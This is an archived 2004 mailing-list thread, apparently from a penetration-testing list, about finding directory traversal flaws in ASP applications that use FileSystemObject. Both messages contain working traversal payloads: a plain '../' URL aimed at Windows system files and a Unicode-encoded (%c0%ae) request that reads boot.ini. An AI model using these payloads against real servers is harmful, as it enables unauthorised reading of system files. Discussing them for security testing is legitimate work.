From: Chan Fook Sheng (chanfooksheng@pacific.net.sg)
Date: Thu May 06 2004 - 03:44:56 EDT
I assume you are using Unicode UTF-8 right?
I tried
http://client/file.asp?File=../../../../../../../../../winnt/system32/vga.drv
system.drv
but I still got a normal page, but no content in the main frame. I use
Paros proxy, and I can't see any error pages in the htp response at all,
all requests are responded by HTTP 200 OK.
It seems to me there is no sure way to know if they are using
FileSystemObject or not, am I right? What I can do is to try all
possible techniques, and if there is no positive results, I should look
for something more interesting, am I right to say that?
"files which contain bytes that are illegal in a file name" care to quote some examples?
H D Moore wrote:
>On Monday 03 May 2004 06:16, Chan Fook Sheng wrote:
>
>
>>I am trying to get the application to display any files on the
>>filesystem. I have ried appending %00 etc.. but to no avail.
>>Anyone knows of more techniques to try?
>>
>>
>
>For ASP scripts that pass user input directly into the FileSystemObject,
>you can use unicode tricks to perform a directory traversal. This nice
>thing about this attack is that there is no easy defense in the ASP
>language; Microsoft's own "secure" ShowCode.asp was vulnerable to this
>type of flaw. A sample traversal would look like:
>
>somebustedcode.asp?mahfile=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
>
>
>
>>How can one determine whether a web application is opening files for
>>read, hence making it possible for directory traversal attack?
>>
>>
>
>Try passing a variety of invalid names and look for a difference in the
>returned error message. Using file names with reserved device names may
>return a non-standard response, same goes for files which contain bytes
>that are illegal in a file name...
>
>-HD
>
>
>------------------------------------------------------------------------------
>Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off
>any course! All of our class sizes are guaranteed to be 10 students or less
>to facilitate one-on-one interaction with one of our expert instructors.
>Attend a course taught by an expert instructor with years of in-the-field
>pen testing experience in our state of the art hacking lab. Master the skills
>of an Ethical Hacker to better assess the security of your organization.
>Visit us at:
>http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>-------------------------------------------------------------------------------
>
>
------------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off
any course! All of our class sizes are guaranteed to be 10 students or less
to facilitate one-on-one interaction with one of our expert instructors.
Attend a course taught by an expert instructor with years of in-the-field
pen testing experience in our state of the art hacking lab. Master the skills
of an Ethical Hacker to better assess the security of your organization.
Visit us at:
http://www.infosecinstitute.com/courses/ethical_hacking_training.html
-------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:53 EDT